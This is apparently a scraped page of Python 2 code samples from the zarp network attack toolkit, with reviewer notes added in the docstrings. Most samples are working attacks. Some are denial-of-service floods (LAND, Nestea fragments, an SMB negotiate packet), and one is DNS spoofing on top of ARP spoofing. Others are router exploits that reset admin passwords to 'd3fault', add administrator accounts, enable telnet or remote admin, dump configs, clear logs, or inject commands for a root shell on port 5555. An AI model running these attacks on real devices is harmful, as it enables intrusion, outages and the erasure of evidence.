Exemplo n.º 1
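def update():
    """Update the checkout in the current directory from the upstream repo.

    Requires ./.git/config to exist and refuses to run while the dev branch
    is checked out.  The pull goes over HTTPS instead of the unauthenticated
    git:// transport, so the fetched code is protected in transit.

    NOTE(review): the pulled code is trusted as-is; nothing here verifies a
    signed tag or commit before the updated tool is run again.
    """
    if not util.does_file_exist('./.git/config'):
        util.Error(
            'Not a git repo; please checkout from Github with \n\tgit clone https://github.com/hatRiot/zarp.git\n to update.'
        )
        return

    util.Msg('Updating Zarp...')
    # A non-trivial grep result means the current branch marker is on dev.
    ret = util.init_app('git branch -a | grep \'* dev\'', True)
    if len(ret) > 3:
        util.Error(
            'You appear to be on the dev branch.  Please switch off dev to update.'
        )
        return

    ret = util.init_app('git pull https://github.com/hatRiot/zarp.git HEAD',
                        True)
    # Newer git releases print the message without the hyphen.
    if 'Already up-to-date' in ret or 'Already up to date' in ret:
        util.Msg('Zarp already up to date.')
    elif 'fatal' in ret:
        util.Error('Error updating Zarp: %s' % ret)
    else:
        from util import version
        util.Msg('Zarp updated to version %s' % (version()))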
    def initialize(self):
        """Send a password-change request and then a log-clear request.

        Asks the operator for the firmware generation ('2' selects url_25,
        any other answer url_30), requests a URL that sets the admin
        password to 'd3fault', then requests a URL that clears the device
        log.  urllib.urlopen is called with the URL only, so no header or
        cookie is added; whether ex_param1 acts as a credential is not
        visible here.

        NOTE(review): defensive reading -- a state-changing admin action
        reachable through a plain GET means the management interface should
        not be exposed to untrusted networks, and since the log is cleared
        afterwards, on-device logs cannot be the only record; forward them
        off the device.
        """
        version = util.get_input('Enter Zoom version [2/3]: ')
        util.Msg('Changing admin password to \'d3fault\'...')

        # Two variants of the same password-change form, one per generation.
        url_25 = 'http://%s/hag/emweb/PopOutUserModify.htm/FormOne&user=admin&'\
                 'ex_param1=admin&new_pass1=d3fault&new_pass2=d3fault&id=3&'\
                 'cmdSubmit=Save+Changes' % self.config['target'].value
        url_30 = 'http://%s/hag/emweb/PopOutUserModify.htm?id=40&user=admin&'\
                 'Zadv=1&ex_param1=admin&new_pass1=d3fault&new_pass2=d3fault&'\
                 'id=3&cmdSubmit=Save+Changes' % self.config['target'].value
        # Log-clear action requested after the password change.
        url_logs = 'http://%s/Action?id=76&cmdClear+Log=Clear+Log' % self.config[
            'target'].value

        try:
            if version == '2':
                urllib.urlopen(url_25).read()
            else:
                urllib.urlopen(url_30).read()

            # The response bodies are discarded; success is assumed when
            # no exception is raised.
            util.Msg("Password reset, clearing logs...")
            urllib.urlopen(url_logs).read()
            util.Msg('Done.  Connect to %s with admin:d3fault' %
                     self.config['target'].value)
        except Exception, e:
            # Python 2 except syntax; any failure is reported as a
            # connection problem.
            util.Error('Unable to connect: %s' % e)
Exemplo n.º 3
    def initialize(self):
        """Send three IP fragments to the configured target in a loop.

        All three packets share IP id 42: two carry the more-fragments flag
        with a UDP header and padding, one is placed at fragment offset 48.
        After each round self.is_alive() decides whether to prompt for
        another round or stop.

        NOTE(review): defensive reading -- fragments that share an id but
        do not line up are something a reassembling firewall or IDS can
        drop or alert on; presumably only unpatched legacy stacks are
        affected -- confirm before relying on that.
        """
        target = self.config['target'].value
        try:
            pkt1 = IP(dst=target, id=42, flags="MF") / UDP() / ("X" * 10)
            pkt2 = IP(dst=target, id=42, frag=48) / ("X" * 116)
            pkt3 = IP(dst=target, id=42, flags="MF") / UDP() / ("X" * 224)
            while True:
                util.Msg('DoSing %s...' % target)
                send(pkt1)
                send(pkt2)
                send(pkt3)

                # is_alive() is defined outside this listing; its probe
                # method is not visible here.
                if self.is_alive():
                    util.Msg('Host appears to still be up.')
                    try:
                        tmp = raw_input('[!] Try again? [Y/n] ')
                    except Exception:
                        break
                    # Any answer containing the letter 'n' stops the loop.
                    if 'n' in tmp.lower():
                        break
                else:
                    util.Msg('Host not responding!')
                    break
        except KeyboardInterrupt:
            return
        except Exception:
            # Every other failure is reported as an address problem.
            util.Error('Error with given address.  Could not complete DoS.')
            return
Exemplo n.º 4
    def initialize(self):
        """Prompt for an address and send TCP packets whose source is the target.

        Each packet has identical source and destination addresses and
        identical source and destination ports (134).  The loop continues
        while self.is_alive() is true and the operator does not answer
        with an 'n'.

        NOTE(review): defensive reading -- a packet arriving from outside
        with a source address equal to its destination is never legitimate;
        ingress anti-spoofing filters can drop it at the edge.
        """
        # suppress scapy output (changes the process-wide scapy setting)
        conf.verb = 0

        try:
            # The entered address is used as typed; it is not validated here.
            self.target = raw_input('[!] Enter IP to DoS: ')
            tmp = raw_input('[!] LAND attack at ip %s.  Is this correct? ' %
                            self.target)
            if 'n' in tmp.lower():
                return

            while True:
                print '[!] DoSing %s...' % self.target
                send(
                    IP(src=self.target, dst=self.target) /
                    TCP(sport=134, dport=134))

                if self.is_alive():
                    util.Msg('Host appears to still be up.')
                    try:
                        tmp = raw_input('[!] Try again? ')
                    except Exception:
                        break
                    if 'n' in tmp.lower():
                        break
                else:
                    util.Msg('Host not responding!')
                    break
        except Exception, j:
            # Python 2 except syntax.  KeyboardInterrupt is not an
            # Exception subclass, so Ctrl-C is not handled here.
            util.Error('Error: %s' % j)
            return
Exemplo n.º 5
    def initialize(self):
        """Send one fixed SMB negotiate request to TCP 445 and check liveness.

        The byte string is a hard-coded request: a 4-byte length prefix, the
        '\\xffSMB' magic, command byte 0x72 and a dialect list ending in
        'SMB 2.002'.  After sending, self.is_alive() is used to report
        whether the host still answers.

        NOTE(review): defensive reading -- TCP 445 should not be reachable
        from untrusted networks.  The blanket except below prints 'not
        susceptible' for any failure, including a refused connection, so
        that message is not evidence that a host is patched.
        """
        try:
            pkt = ("\x00\x00\x00\x90"
                   "\xff\x53\x4d\x42"
                   "\x72\x00\x00\x00"
                   "\x00\x18\x53\xc8"
                   "\x00\x26"
                   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
                   "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
                   "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
                   "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
                   "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
                   "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
                   "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
                   "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
                   "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
                   "\x30\x30\x32\x00")

            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

            # get_ip() is defined outside this listing; presumably it sets
            # self.target -- confirm.
            self.get_ip()
            sock.connect((self.target, 445))
            sock.send(pkt)
            # The socket is only closed on the success path.
            sock.close()

            if self.is_alive():
                util.Msg('Host appears to be up')
            else:
                util.Msg('Host is not responding - '
                         'it is either down or rejecting our probes.')
        except Exception:
            util.Error('Remote host not susceptible to vulnerability.')
            return
Exemplo n.º 6
 def run(self):
     """POST a settings form to start_apply.htm on self.ip.

     The form names product id RT-N56U, sets the three password fields to
     'd3fault' and sets telnetd to '1'.  No credentials are attached by
     this code.

     NOTE(review): defensive reading -- a settings endpoint that accepts
     this form without a session lets anyone on the network replace the
     admin password and open telnet; keep the web UI off untrusted
     segments and watch for telnetd being switched on unexpectedly.
     """
     util.Msg(
         'Changing admin password and enabling remote telnet server...')
     try:
         data = urlencode({
             'productid': 'RT-N56U',
             'current_page': 'Advanced_System_Content.asp',
             'next_page': '',
             'next_host': '',
             'sid_list': 'LANHostConfig%3BGeneral%3B',
             'group_id': '',
             'modified': '0',
             'action_mode': '+Apply+',
             'first_time': '',
             'action_script': '',
             'preferred_lang': 'EN',
             'wl_ssid2': 'wat',
             'firmver': '1.0.7f',
             'http_passwd': 'd3fault',
             'http_passwd2': 'd3fault',
             'v_password2': 'd3fault',
             'log_ipaddr': '',
             'time_zone': 'UCT12',
             'ntp_server0': 'pool.ntp.org',
             'telnetd': '1'
         })
         response = urlopen("http://%s/start_apply.htm" % self.ip,
                            data).read()
         # Only a message is printed here; no answer is read and the
         # 'Done' line below is printed regardless of the response.
         if "You cannot Login unless logout another user first" in response:
             util.Msg("Another user is logged in, attempt to logout? [y] ")
         util.Msg('Done.  telnet into %s with \'admin:d3fault\'' % self.ip)
     except Exception, e:
         # Python 2 except syntax.
         util.Error('Error: %s' % e)
Exemplo n.º 7
    def initialize(self):
        """Prompt for an address and send three IP fragments to it in a loop.

        The prompt labels this the Nestea DoS.  All three packets share IP
        id 42: two carry the more-fragments flag with a UDP header and
        padding, one is placed at fragment offset 48.  The loop repeats
        while self.is_alive() is true and the operator does not answer
        with an 'n'.

        NOTE(review): defensive reading -- inconsistent fragments sharing
        one id can be dropped by a reassembling firewall or flagged by an
        IDS; presumably only unpatched legacy stacks are affected --
        confirm.
        """
        # silence scapy (changes the process-wide scapy setting)
        conf.verb = 0

        try:
            # The entered address is used as typed; it is not validated here.
            self.target = raw_input('[!] Enter IP address to DoS: ')
            tmp = raw_input('[!] Nestea DoS IP %s.  Is this correct? ' %
                            self.target)
            if 'n' in tmp.lower():
                return

            while True:
                util.Msg('DoSing %s...' % self.target)
                send(
                    IP(dst=self.target, id=42, flags="MF") / UDP() /
                    ("X" * 10))
                send(IP(dst=self.target, id=42, frag=48) / ("X" * 116))
                send(
                    IP(dst=self.target, id=42, flags="MF") / UDP() /
                    ("X" * 224))

                if self.is_alive():
                    util.Msg('Host appears to still be up.')
                    try:
                        tmp = raw_input('[!] Try again? ')
                    except Exception:
                        break
                    if 'n' in tmp.lower():
                        break
                else:
                    util.Msg('Host not responding!')
                    break
        except Exception, j:
            # Python 2 except syntax; j is bound but not used in the message.
            util.Error('Error with given address.  Could not complete DoS.')
            return
Exemplo n.º 8
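def parse(sysv, loader):
    """Build the command line from the loaded modules and run the selection.

    Modules can register their own CLI options through a ``cli`` method;
    only services and scanners are consulted.  Exactly one action runs
    (sniff, update, or the first module whose flag was set) and the process
    then exits through ``sys.exit(1)``, as it did on every path before.

    sysv   -- unused here; argparse reads sys.argv itself.
    loader -- object exposing ``services`` and ``scanner`` collections of
              module classes.
    """
    parser = argparse.ArgumentParser(description=util.header())

    # add standard options
    parser.add_argument('-q', help='Generic network sniff', action='store',
                        dest='filter')
    parser.add_argument('--update', help='Update Zarp', action='store_true',
                        default=False, dest='update')

    service_group = parser.add_argument_group('Services')
    scanner_group = parser.add_argument_group('Scanners')

    # iterate through loaded modules and build the argument parser
    for service in loader.services:
        if hasattr(service, 'cli'):
            service().cli(service_group)

    for scanner in loader.scanner:
        if hasattr(scanner, 'cli'):
            scanner().cli(scanner_group)

    options = parser.parse_args()
    option_dict = options.__dict__

    # first handle standard options
    if options.filter:
        util.Msg("Sniffing with filter [%s]...(ctrl^c to exit)" %
                 options.filter)
        try:
            sniff(filter=options.filter, store=0, prn=lambda x: x.summary())
        except Scapy_Exception as msg:
            # Must come before the generic handler, which would otherwise
            # swallow it and hide the scapy error from the operator.
            util.Error(msg)
        except Exception:
            util.Msg("Exiting sniffer..")
        sys.exit(1)
    elif options.update:
        update()
        sys.exit(1)

    # we can only launch one module at a time, so grab the first
    selected = [x for x in option_dict if option_dict[x] is True]
    if not selected:
        # No module flag given: show usage instead of failing on an
        # empty list.
        parser.print_help()
        sys.exit(1)
    usr_mod = selected[0]

    # see what it is
    if usr_mod in [x().which for x in loader.services]:
        module = [x for x in loader.services if x().which == usr_mod][0]
        util.Msg('Starting %s...' % module().which)
        mod = module()
        mod.dump_data = True
        mod.initialize()
    elif usr_mod in [x().which for x in loader.scanner]:
        module = [x for x in loader.scanner if x().which == usr_mod][0]
        module().initialize()
    sys.exit(1)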
Exemplo n.º 9
Arquivo: dns.py Projeto: winpa01/zarp
    def initialize(self):
        """Set up a DNS spoofing rule on top of an existing ARP spoof session.

        Requires an 'ARP Spoof' entry in stream.HOUSE.  The operator picks
        a session by number, supplies a regex for DNS names and a
        replacement value, confirms, and a thread running self.dns_sniffer
        is started.

        NOTE(review): defensive reading -- this depends on an ARP spoof
        already being in place, so controls that stop ARP spoofing on the
        LAN also stop this; validating resolvers give a second check.
        """
        try:
            arps = None
            key = None
            if 'ARP Spoof' in stream.HOUSE:
                house = stream.HOUSE['ARP Spoof']
            else:
                util.Error('ARP spoof required!')
                return

            while True:
                stream.dump_module_sessions('ARP Spoof')
                try:
                    num = int(raw_input('[number] > '))
                except TypeError:
                    # A non-numeric entry raises ValueError from int(),
                    # which is handled by the generic except at the bottom
                    # rather than by this clause.
                    continue
                # Only the upper bound is checked; a negative number
                # indexes from the end of the key list.
                if len(house.keys()) > num:
                    key = house.keys()[num]
                    arps = house[key]

                    self.source = arps.victim[0]
                    self.local_mac = arps.local[1]
                    break
                else:
                    return

            dns_name = raw_input('[!] Enter regex to match DNS:\t')
            # The lookup uses the raw string, while the key stored below
            # is the compiled pattern object.
            if dns_name in self.dns_spoofed_pair:
                util.Msg('DNS is already being spoofed (%s).' %
                         (self.dns_spoofed_pair[dns_name]))
                return

            dns_spoofed = raw_input('[!] Spoof DNS entry matching %s to:\t' %
                                    (dns_name))
            tmp = raw_input(
                '[!] Spoof DNS record \'%s\' to \'%s\'.  Is this correct?' %
                (dns_name, dns_spoofed))

            if 'n' in tmp.lower():
                return

            # re.error from an invalid pattern is handled below.
            dns_name = re.compile(dns_name)
            self.dns_spoofed_pair[dns_name] = dns_spoofed
            self.running = True

            util.Msg('Starting DNS spoofer...')
            thread = Thread(target=self.dns_sniffer)
            thread.start()
        except KeyboardInterrupt:
            return None
        except re.error:
            util.Error('Invalid regex given.')
            return None
        except Exception, j:
            # Python 2 except syntax.
            util.Error('Error: %s' % j)
            return None
Exemplo n.º 10
 def shutdown(self):
     """Mark the service stopped, close its log if logging, and report it."""
     util.Msg('Shutting %s service down..' % self.which)

     # Only overwrite the flag when it is currently truthy.
     if self.running:
         self.running = False

     # log(False, None) is the module's own call for turning logging off.
     if self.log_data:
         self.log(False, None)

     finished = '%s shutdown.' % self.which
     util.Msg(finished)
     util.debug(finished)
Exemplo n.º 11
 def initialize(self):
     """Request /config.bin from the configured target and print the body.

     urllib.urlopen is called with the URL only; no credentials are sent.

     NOTE(review): defensive reading -- if a device answers this request,
     its configuration backup is readable without login and every secret
     stored in it should be treated as exposed.
     """
     util.Msg('Fetching config from %s...' % self.config['target'].value)
     url = 'http://%s/config.bin' % self.config['target'].value
     try:
         response = urllib.urlopen(url).read()
         # The raw body is printed as-is, whatever the server returned.
         util.Msg(response)
     except Exception, e:
         # Python 2 except syntax.
         util.Error('Error: %s' % e)
Exemplo n.º 12
 def run(self):
     """Request /config.bin from self.ip and print the body.

     urllib.urlopen is called with the URL only; no credentials are sent.

     NOTE(review): defensive reading -- if a device answers this request,
     its configuration backup is readable without login and every secret
     stored in it should be treated as exposed.
     """
     util.Msg('Fetching config from %s...' % self.ip)
     url = 'http://%s/config.bin' % self.ip
     try:
         response = urllib.urlopen(url).read()
         # The raw body is printed as-is, whatever the server returned.
         util.Msg(response)
     except Exception, e:
         # Python 2 except syntax.
         util.Error('Error: %s' % e)
Exemplo n.º 13
 def run(self):
     """Request redpass.cgi on self.ip with a new admin password.

     The password travels in the query string of a plain HTTP GET and no
     credentials are attached by this code.

     NOTE(review): defensive reading -- a password-change endpoint that
     works without the current password or a session should be closed by
     a firmware update or kept off untrusted networks.
     """
     util.Msg('Changing admin password to \'d3fault\'...')
     try:
         url = 'http://%s/redpass.cgi?sysPassword=d3fault&change=1' % self.ip
         # The body is read but not inspected; success is assumed when no
         # exception is raised.
         response = urllib.urlopen(url).read()
         util.Msg('Done.  Admin password changed to \'d3fault\'')
     except Exception, e:
         # Python 2 except syntax.
         util.Error('Error: %s' % e)
         return
Exemplo n.º 14
    def shutdown(self):
        """Stop the module: clear the running flag, end logging, report it."""
        util.Msg('Shutting \'%s\' down..' % self.which)

        # Only overwrite the flag when it is currently truthy.
        if self.running:
            self.running = False

        # log(False) is the module's own call for turning logging off.
        if self.log_data:
            self.log(False)

        finished = '%s shutdown.' % self.which
        util.Msg(finished)
        util.debug(finished)
Exemplo n.º 15
	def run(self):
		"""Request paths under /level/ on self.ip and report the first '200 ok'.

		For indices 16 through 99 the URL is extended with '<idx>/exec/-'
		and fetched; a body containing '200 ok' (case-insensitive) is
		reported as vulnerable.  There is no exception handling, so a
		connection failure propagates to the caller.

		NOTE(review): defensive reading -- 'not vulnerable' here only means
		no body contained '200 ok'; it is not assurance.  A device's HTTP
		management server should be disabled or limited to a management
		network.
		"""
		url = 'http://%s/level/'%(self.ip)
		for idx in range(16, 100):
			# url is extended in place on every pass.
			url += str(idx) + '/exec/-'
			response = urllib.urlopen(url).read()
			if '200 ok' in response.lower():
				util.Msg('Device vulnerable.  Connect to %s for admin'%(self.ip))
				return
		util.Msg('Device not vulnerable.')
		return
Exemplo n.º 16
 def initialize(self):
     """Request redpass.cgi on the configured target with a new admin password.

     The password travels in the query string of a plain HTTP GET and no
     credentials are attached by this code.

     NOTE(review): defensive reading -- a password-change endpoint that
     works without the current password or a session should be closed by
     a firmware update or kept off untrusted networks.
     """
     util.Msg('Changing admin password to \'d3fault\'...')
     try:
         url = 'http://%s/redpass.cgi?sysPassword=d3fault&change=1' \
                                     % self.config['target'].value
         # The body is discarded; success is assumed when no exception
         # is raised.
         urllib.urlopen(url).read()
         util.Msg('Done.  Admin password changed to \'d3fault\'')
     except Exception, e:
         # Python 2 except syntax.
         util.Error('Error: %s' % e)
         return
Exemplo n.º 17
    def initialize(self):
        """Apply the port redirection via self.modip() and mark it running.

        Always returns True; self.modip() is defined outside this listing.
        """
        util.Msg("Starting redirect_port...")
        self.modip()
        self.running = True

        # Read the two configured ports after the rule has been applied.
        src_port = self.config['source_port'].value
        dst_port = self.config['dest_port'].value
        banner = "Redirection to from TCP port {0} to {1}...".format(
            src_port, dst_port)
        util.Msg(banner)
        return True
Exemplo n.º 18
 def run(self):
     """POST an add-administrator form to tools_admin.php on self.ip.

     The URL carries NO_NEED_AUTH=1 and AUTH_GROUP=0 as query parameters;
     the form body names the new account and its password fields.

     NOTE(review): defensive reading -- if a request parameter can switch
     authentication off, the check is being made from client input; the
     fix belongs in firmware, and unexpected administrator accounts are
     the thing to audit for.
     """
     util.Msg('Adding admin \'adm4n\' with password \'d3fault\'')
     url = 'http://%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0'%self.ip
     params = urllib.urlencode({'ACTION_POST':1, 'admin_name':'adm4n','admin_password':'******',
                                 'admin_password2':'d3fault'})
     try:
         # The body is read but not inspected; success is assumed when no
         # exception is raised.
         response = urllib.urlopen(url,params).read()
         util.Msg('Done.  Connect to %s with \'adm4n:d3fault\'' % self.ip)
     except Exception, e:
         # Python 2 except syntax.
         util.Error('Failed: %s' % e)
         return
Exemplo n.º 19
 def initialize(self):
     """Request paths under /level/ on the target and report the first '200 ok'.

     For indices 16 through 99 the URL is extended with '<idx>/exec/-' and
     fetched; a body containing '200 ok' (case-insensitive) is reported as
     vulnerable.  There is no exception handling, so a connection failure
     propagates to the caller.

     NOTE(review): defensive reading -- 'not vulnerable' here only means no
     body contained '200 ok'; it is not assurance.  A device's HTTP
     management server should be disabled or limited to a management
     network.
     """
     url = 'http://%s/level/' % (self.config['target'].value)
     for idx in range(16, 100):
         # url is extended in place on every pass.
         url += str(idx) + '/exec/-'
         response = urllib.urlopen(url).read()
         if '200 ok' in response.lower():
             util.Msg('Device vulnerable.  Connect to %s for admin'
                                       % (self.config['target'].value))
             return
     util.Msg('Device not vulnerable.')
     return
Exemplo n.º 20
	def view(self):
		"""Print every mapped host (ip, mac, host name) and a final count.

		Overrides the sniffer view; when nothing has been mapped yet only a
		notice is printed.
		"""
		if len(self.netmap) <= 0:
			util.Msg("No hosts yet mapped.")
			return

		for address in self.netmap.keys():
			entry = self.netmap[address]
			print '\t%s\t%s\t%s' % (entry.ip, entry.mac, entry.host)
		util.Msg('\t %s hosts found.' % len(self.netmap))
Exemplo n.º 21
 def run(self):
     """Request manage.tri on self.ip with new admin password parameters.

     Everything, including the new password, is sent in the query string
     of a plain HTTP GET; no credentials are attached by this code.

     NOTE(review): defensive reading -- management settings that can be
     changed by an unauthenticated GET need a firmware fix or network
     isolation of the web UI.
     """
     util.Msg('Resetting admin password to \'d3fault\'...')
     try:
         url = 'http://%s/manage.tri?remote_mg_https=0&http_enable=1&https_enable=0' \
               '&PasswdModify=1&http_passwd=d3fault&http_passwdConfirm=d3fault' \
               '&_http_enable=1&web_wl_filter=1&remote_management=0&upnp=_enable=1'\
               '&layout=en' % self.ip
         # The body is discarded; 'Done' is printed when no exception
         # is raised.
         urllib.urlopen(url).read()
         util.Msg('Done')
     except Exception, e:
         # Python 2 except syntax.
         util.Error('Error: %s' % e)
         return
Exemplo n.º 22
 def run(self):
     """Request tools_admin.cgi on self.ip with new passwords and remote admin.

     The query string sets the admin and user passwords to 'd3fault' and
     carries hip1=*, hport=8080 and hEnable=1; no credentials are attached
     by this code.

     NOTE(review): defensive reading -- a remote administration listener
     appearing on port 8080 of a router is a change worth alerting on, and
     the endpoint itself needs a firmware fix or network isolation.
     """
     util.Msg('Changing admin password to \'d3fault\' '
              'and enabling remote admin on port 8080...')
     try:
         url = 'http://%s/tools_admin.cgi?admname=admin&admPass1=d3fault' \
               '&admPass2=d3fault&username=admin&userPass1=d3fault&userPass2=d3fault' \
               '&hip1=*&hport=8080&hEnable=1' % self.ip
         # The body is discarded; success is assumed when no exception
         # is raised.
         urllib.urlopen(url).read()
         util.Msg('Admin password changed to \'d3fault\' '
                  'and interface enabled on 8080')
     except Exception, e:
         # Python 2 except syntax.
         util.Error('Error: %s' % e)
Exemplo n.º 23
 def initialize(self):
     """Fetch two router-info pages from the configured target and print them.

     Both /router-info.htm and /cgi-bin/router-info.htm are requested with
     urllib.urlopen and no credentials; the bodies are printed unmodified.

     NOTE(review): defensive reading -- the status line says a password is
     being fetched, so presumably these pages disclose it; if a device
     serves them without login, rotate the credentials and restrict the
     web UI.
     """
     util.Msg('Fetching password from %s...' % self.config['target'].value)
     url = 'http://%s/router-info.htm' % self.config['target'].value
     url2 = 'http://%s/cgi-bin/router-info.htm' % self.config['target'].value
     try:
         # If either request fails, nothing is printed for either page.
         response = urllib.urlopen(url).read()
         response2 = urllib.urlopen(url2).read()
         util.Msg('First:')
         print '\t' + response
         util.Msg('Second:')
         print '\t' + response2
     except Exception, e:
         # Python 2 except syntax.
         util.Error('Error: %s' % e)
Exemplo n.º 24
 def run(self):
     """Send self.inject and then self.hard_save to TCP port 8000 on self.ip.

     Both payloads are attributes defined outside this listing.  The final
     message tells the operator a shell is expected on port 5555 after the
     device reboots.

     NOTE(review): defensive reading -- a service on port 8000 that accepts
     unauthenticated input should be firewalled, and a new listener on
     port 5555 after a reboot is a sign of compromise.
     """
     try:
         util.Msg('Executing command injection on %s...' % self.ip)
         sock = socket.socket()
         sock.connect((self.ip, 8000))
         sock.sendall(self.inject)
         # Fixed pause between the two payloads.
         time.sleep(3)
         util.Msg('Forcing the device to save...')
         sock.sendall(self.hard_save)
         # The socket is only closed on the success path.
         sock.close()
         util.Msg('Reboot router for root shell on %s:5555' % (self.ip))
     except Exception, e:
         # Python 2 except syntax.
         util.Error('Error: %s' % e)
Exemplo n.º 25
 def run(self):
     """Fetch two router-info pages from self.ip and print them.

     Both /router-info.htm and /cgi-bin/router-info.htm are requested with
     urllib.urlopen and no credentials; the bodies are printed unmodified.

     NOTE(review): defensive reading -- the status line says a password is
     being fetched, so presumably these pages disclose it; if a device
     serves them without login, rotate the credentials and restrict the
     web UI.
     """
     util.Msg('Fetching password from %s...' % self.ip)
     url = 'http://%s/router-info.htm' % self.ip
     url2 = 'http://%s/cgi-bin/router-info.htm' % self.ip
     try:
         # If either request fails, nothing is printed for either page.
         response = urllib.urlopen(url).read()
         response2 = urllib.urlopen(url2).read()
         util.Msg('First:')
         print '\t' + response
         util.Msg('Second:')
         print '\t' + response2
     except Exception, e:
         # Python 2 except syntax.
         util.Error('Error: %s' % e)
Exemplo n.º 26
 def run(self):
     """Build a start_apply.htm URL for self.ip and request it.

     The query string names product id RT-N56U, sets the three password
     fields to 'd3fault' and sets telnetd=1.  Any exception raised while
     building or requesting the URL is reported through util.Error.

     NOTE(review): defensive reading -- a settings endpoint that accepts
     these parameters without a session lets anyone on the network replace
     the admin password and open telnet; keep the web UI off untrusted
     segments and watch for telnetd being switched on unexpectedly.
     """
     util.Msg(
         'Changing admin password and enabling remote telnet server...')
     try:
         url = 'http://%s/start_apply.htm?productid=RT-N56U&current_page=Advanced_System_Content.asp' \
            '&next_page=&next_host=&sid_list=LANHostConfig%3BGeneral%3B&group_id=&modified=0' \
            '&action_mode=+Apply+&first_time=&action_script=&preferred_lang=EN&wl_ssid2=wat'\
            '&firmver=1.0.7f&http_passwd=d3fault&http_passwd2=d3fault&v_password2=d3fault' \
            '&log_ipaddr=&time_zone=UCT12&ntp_server0=pool.ntp.org&telnetd=1'%self.ip
         # The body is read but not inspected.
         response = urllib.urlopen(url).read()
         util.Msg('Done.  telnet into %s with \'admin:d3fault\'' % self.ip)
     except Exception, e:
         # Python 2 except syntax.
         util.Error('Error: %s' % e)
Exemplo n.º 27
    def view(self):
        """Put the module in 'focus' until the operator presses enter.

        While focused, dump_data is True so status and informational
        output is shown; it is switched back off on enter or on Ctrl-C.
        """
        try:
            util.Msg('[enter] when finished')
            util.Msg('Dumping output from \'%s\'...' % self.which)
            self.dump_data = True
            raw_input()
        except KeyboardInterrupt:
            # Ctrl-C leaves focus the same way enter does.
            pass
        self.dump_data = False
Exemplo n.º 28
 def initialize(self):
     """Send self.inject and then self.hard_save to TCP port 8000 on the target.

     Both payloads are attributes defined outside this listing.  The final
     message tells the operator a shell is expected on port 5555 after the
     device reboots.

     NOTE(review): defensive reading -- a service on port 8000 that accepts
     unauthenticated input should be firewalled, and a new listener on
     port 5555 after a reboot is a sign of compromise.
     """
     try:
         util.Msg('Executing command injection on %s...' %
                  self.config['target'].value)
         sock = socket.socket()
         sock.connect((self.config['target'].value, 8000))
         sock.sendall(self.inject)
         # Fixed pause between the two payloads.
         sleep(3)
         util.Msg('Forcing the device to save...')
         sock.sendall(self.hard_save)
         # The socket is only closed on the success path.
         sock.close()
         util.Msg('Reboot router for root shell on %s:5555' %
                  (self.config['target'].value))
     except Exception, e:
         # Python 2 except syntax.
         util.Error('Error: %s' % e)
Exemplo n.º 29
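 def initialize(self):
     """Run an access-point scan on a monitor-mode wireless interface.

     Returns False when airmon-ng is not installed.  Otherwise returns None
     once self.ap_scan() ends, is interrupted with Ctrl-C, or fails.
     """
     try:
         if not util.check_program('airmon-ng'):
             # The message now names the program that was actually checked.
             util.Error(
                 'airmon-ng not installed.  Please install to continue.')
             return False
         util.Msg('(ctrl^c) when finished.')
         iface = util.get_monitor_adapter()
         if iface is None:
             util.Msg('No devices found in monitor mode.  Enabling...')
             iface = util.enable_monitor(self.channel)
         util.debug('Using interface %s' % iface)
         self.ap_scan(iface)
     except (Exception, KeyboardInterrupt):
         # The earlier "except Exception, KeyboardInterrupt" form bound the
         # caught Exception to the name KeyboardInterrupt and never caught
         # Ctrl-C, although the prompt above tells the operator to use it.
         return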
Exemplo n.º 30
 def initialize(self):
     """Start self.listener on a new thread and return the session label."""
     util.Msg('Starting NUD DoS listener...')
     # The flag is set before the thread starts, as in the original order.
     self.running = True
     Thread(target=self.listener).start()
     return 'NuD DoS Listener'